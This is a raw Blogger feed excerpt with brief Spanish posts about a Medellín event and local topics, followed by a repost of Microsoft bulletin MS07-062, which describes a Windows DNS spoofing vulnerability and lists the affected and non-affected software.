Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3054296018916209691</id><published>2011-02-14T09:47:00.003-08:00</published><updated>2011-02-14T09:47:41.373-08:00</updated><title type='text'></title><content type='html'>Gabriel Jaime Rico Alcalde Archivo de Audio de la W &lt;a href="http://goo.gl/ORwuL"&gt;http://goo.gl/ORwuL&lt;/a&gt; #RicoAlcalde&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-3054296018916209691?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/3054296018916209691/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=3054296018916209691' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3054296018916209691'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3054296018916209691'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/gabriel-jaime-rico-alcalde-archivo-de.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-9060031369582179788</id><published>2011-02-14T09:47:00.001-08:00</published><updated>2011-02-14T09:47:02.581-08:00</updated><title type='text'></title><content type='html'>Gabriel Jaime Rico Alcalde en la W &lt;a href="http://goo.gl/ORwuL"&gt;http://goo.gl/ORwuL&lt;/a&gt; #RicoAlcalde&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-9060031369582179788?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/9060031369582179788/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=9060031369582179788' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9060031369582179788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9060031369582179788'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/gabriel-jaime-rico-alcalde-en-la-w.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7090216602757937567</id><published>2011-02-13T19:35:00.001-08:00</published><updated>2011-02-13T19:35:34.955-08:00</updated><title type='text'></title><content type='html'>el que pega primero pega dos veces...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7090216602757937567?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7090216602757937567/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7090216602757937567' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7090216602757937567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7090216602757937567'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/el-que-pega-primero-pega-dos-veces.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5925329069991563147</id><published>2011-02-12T18:53:00.001-08:00</published><updated>2011-02-12T18:53:08.068-08:00</updated><title type='text'></title><content type='html'>Se lavó con negro de embolar zapatos &lt;br /&gt;Porque su mamita no le dio jabón &lt;br /&gt;Y cuando cazaban ratones los gatos &lt;br /&gt;Espantaba al gato gritando ratón&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5925329069991563147?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5925329069991563147/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5925329069991563147' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5925329069991563147'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5925329069991563147'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/se-lavo-con-negro-de-embolar-zapatos.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-623831888279119742</id><published>2011-02-12T08:22:00.001-08:00</published><updated>2011-02-12T08:22:30.259-08:00</updated><title type='text'></title><content type='html'>Buenos dias&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-623831888279119742?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/623831888279119742/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=623831888279119742' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/623831888279119742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/623831888279119742'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/buenos-dias.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-847224085282265242</id><published>2011-02-10T16:10:00.001-08:00</published><updated>2011-02-10T16:10:17.959-08:00</updated><title type='text'></title><content type='html'>Pregunta: los rumores de Medellín o de alguien? si hubiese una WIKILEAKS de Medellín quien cree seria el mas nombrado? #wikileaksmedellin&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-847224085282265242?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/847224085282265242/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=847224085282265242' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/847224085282265242'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/847224085282265242'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/pregunta-los-rumores-de-medellin-o-de.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7175874409285792104</id><published>2011-02-07T15:43:00.001-08:00</published><updated>2011-02-07T15:43:46.173-08:00</updated><title type='text'></title><content type='html'>Estamos Transmitiendo en streaming el evento Innovación y Living Labs &lt;a href="http://goo.gl/F4oGr"&gt;http://goo.gl/F4oGr&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7175874409285792104?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7175874409285792104/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7175874409285792104' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7175874409285792104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7175874409285792104'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/estamos-transmitiendo-en-streaming-el.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-1575672634555211192</id><published>2011-02-07T15:33:00.001-08:00</published><updated>2011-02-07T15:33:10.376-08:00</updated><title type='text'></title><content type='html'>Innovacion abierta y Living Labs @MedellinDigital #livinglabantioquia &lt;a href="http://goo.gl/F4oGr"&gt;http://goo.gl/F4oGr&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-1575672634555211192?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/1575672634555211192/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=1575672634555211192' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1575672634555211192'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1575672634555211192'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/innovacion-abierta-y-living-labs_07.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-6252561095495779662</id><published>2011-02-07T14:21:00.001-08:00</published><updated>2011-02-07T14:21:59.847-08:00</updated><title type='text'></title><content type='html'>preguntas para el evento @MedellinDigital #livinglabantioquia &lt;a href="http://goo.gl/F4oGr"&gt;http://goo.gl/F4oGr&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-6252561095495779662?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/6252561095495779662/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=6252561095495779662' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6252561095495779662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6252561095495779662'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/preguntas-para-el-evento.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-9041920972393460718</id><published>2011-02-07T14:04:00.001-08:00</published><updated>2011-02-07T14:04:25.736-08:00</updated><title type='text'></title><content type='html'>Comenzo el evento! Innovación abierta y Living labs - Museo de Arte Moderno Ciudad del Río #livinglabantioquia &lt;a href="http://goo.gl/F4oGr"&gt;http://goo.gl/F4oGr&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-9041920972393460718?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/9041920972393460718/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=9041920972393460718' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9041920972393460718'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9041920972393460718'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/comenzo-el-evento-innovacion-abierta-y.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4050223965755090840</id><published>2011-02-07T14:03:00.001-08:00</published><updated>2011-02-07T14:03:22.598-08:00</updated><title type='text'></title><content type='html'>Innovación abierta y Living labs #livinglabantioquia&lt;a href="http://goo.gl/F4oGr"&gt;http://goo.gl/F4oGr&lt;/a&gt;&lt;br /&gt;conversatorio 6pm&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4050223965755090840?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4050223965755090840/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4050223965755090840' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4050223965755090840'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4050223965755090840'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/innovacion-abierta-y-living-labs.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7188623624825447391</id><published>2008-02-08T07:14:00.000-08:00</published><updated>2008-02-08T07:15:49.056-08:00</updated><title type='text'>Vulnerability in DNS Allows Spoofing (MS07-062)</title><content type='html'>Tomado de: http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx&lt;br /&gt;&lt;br /&gt;&lt;div class="ancestorLinks"&gt;&lt;nobr&gt;&lt;a href="http://technet.microsoft.com/"&gt;TechNet Home&lt;/a&gt;         &gt;       &lt;/nobr&gt;&lt;nobr&gt;&lt;a href="http://www.microsoft.com/technet/security/default.mspx"&gt;TechNet Security&lt;/a&gt;         &gt;       &lt;/nobr&gt;&lt;nobr&gt;&lt;a href="http://www.microsoft.com/technet/security/current.aspx"&gt;Bulletins&lt;/a&gt;&lt;/nobr&gt;&lt;/div&gt;&lt;h1&gt;Microsoft Security Bulletin MS07-062 – Important&lt;/h1&gt;&lt;h2 class="subtitle"&gt;Vulnerability in DNS Could Allow Spoofing (941672)&lt;/h2&gt;&lt;div class="date"&gt;Published: November 13, 2007&lt;/div&gt;&lt;p&gt;&lt;b&gt;Version:&lt;/b&gt; 1.0&lt;/p&gt;&lt;h2 class="extra"&gt;General Information&lt;/h2&gt;&lt;div class="expandoIndent" style="margin-bottom: 15px;"&gt;&lt;a name="ENB"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='2l1-ENB'&lt;/script&gt;&lt;h3&gt;Executive Summary&lt;/h3&gt;&lt;div id="s2l1-ENB"&gt;&lt;p&gt;This important security update resolves a privately reported vulnerability. This spoofing vulnerability exists in Windows DNS Servers and could allow an attacker to send specially crafted responses to DNS requests, thereby spoofing or redirecting Internet traffic from legitimate locations.&lt;/p&gt;&lt;p&gt;This is an important security update for all supported editions of Microsoft Windows 2000 Server and Windows Server 2003. For more information, see the subsection, &lt;b&gt;Affected and Non-Affected Software&lt;/b&gt;, in this section.&lt;/p&gt;&lt;p&gt;This security update addresses the vulnerability by increasing the randomness of DNS transaction IDs. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, &lt;b&gt;Vulnerability Information&lt;/b&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Recommendation:&lt;/b&gt; Microsoft recommends that customers apply the update at the earliest opportunity.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Known Issues:&lt;/b&gt; None&lt;/p&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENB"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENB"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="ECC"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='2l1-ECC'&lt;/script&gt;&lt;h3&gt;Affected and Non-Affected Software&lt;/h3&gt;&lt;div id="s2l1-ECC"&gt;&lt;p&gt;The software listed here has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21742"&gt;Microsoft Support Lifecycle&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Affected Software&lt;/b&gt;&lt;/p&gt;&lt;table class="dataTable" id="ENC" cellpadding="0" cellspacing="0" width="94%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEQC" width="40%"&gt;Operating System&lt;/td&gt;&lt;td id="colEUC" width="18%"&gt;Maximum Security Impact&lt;/td&gt;&lt;td id="colEYC" width="20%"&gt;Aggregate Severity Rating&lt;/td&gt;&lt;td id="colE3C" style="border-right: 1px solid rgb(204, 204, 204);" width="20%"&gt;Bulletins Replaced by This Update &lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=c80fcd9b-d0f8-44db-96fc-bf2ead054ff4"&gt;Microsoft Windows 2000 Server Service Pack 4&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Spoofing&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx"&gt;MS07-029&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=ed8e2cb4-bcd9-40fc-9ad6-46b364d0656d"&gt;Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Spoofing&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx"&gt;MS07-029&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=d1323e14-ffa7-4d03-a2a7-9240c192a75e"&gt;Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Spoofing&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx"&gt;MS07-029&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=f3ad67de-85ad-452d-a1e0-0af3faf969d6"&gt;Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Spoofing&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx"&gt;MS07-029&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Non-Affected Software&lt;/b&gt;&lt;/p&gt;&lt;table class="dataTable" id="EAF" cellpadding="0" cellspacing="0" width="93%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEDF" style="border-right: 1px solid rgb(204, 204, 204);" width="100%"&gt;Operating System&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Microsoft Windows 2000 Professional Service Pack 4&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Windows XP Service Pack 2&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Windows Vista &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Windows Vista x64&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ECC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ECC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EXF"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 6px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='2l1-EXF';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s2l1-EXF')"&gt;&lt;img id="is2l1-EXF" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h3&gt;&lt;a href="javascript:Toggle('s2l1-EXF')" style="text-decoration: none;"&gt;Frequently Asked Questions (FAQ) Related to This Security Update&lt;/a&gt;&lt;/h3&gt;&lt;a href="javascript:Toggle('s2l1-EXF')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s2l1-EXF"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;I am using an older version or edition of the software discussed in this security bulletin. What should I do?&lt;/b&gt;&lt;br /&gt;The affected software listed in this bulletin has been tested to determine which versions or editions are affected. Other versions and editions are past their support life cycle. To determine the support life cycle for your product and version, visit &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21742"&gt;Microsoft Support Lifecycle&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;It should be a priority for customers who have older versions or editions of the software to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21742"&gt;Microsoft Support Lifecycle&lt;/a&gt;. For more information about the extended security update support period for these operating system versions, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=33328"&gt;Microsoft Product Support Services Web site&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=33329"&gt;Microsoft Worldwide Information Web site&lt;/a&gt;, select the country, and then click &lt;b&gt;Go&lt;/b&gt; to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=33330"&gt;Windows Operating System Product Support Lifecycle FAQ&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EXF"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EXF"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2 class="extra"&gt;Vulnerability Information&lt;/h2&gt;&lt;div class="expandoIndent" style="margin-bottom: 15px;"&gt;&lt;a name="E4G"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 6px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='3l1-E4G';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s3l1-E4G')"&gt;&lt;img id="is3l1-E4G" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h3&gt;&lt;a href="javascript:Toggle('s3l1-E4G')" style="text-decoration: none;"&gt;Severity Ratings and Vulnerability Identifiers&lt;/a&gt;&lt;/h3&gt;&lt;a href="javascript:Toggle('s3l1-E4G')" style="text-decoration: none;"&gt;&lt;script 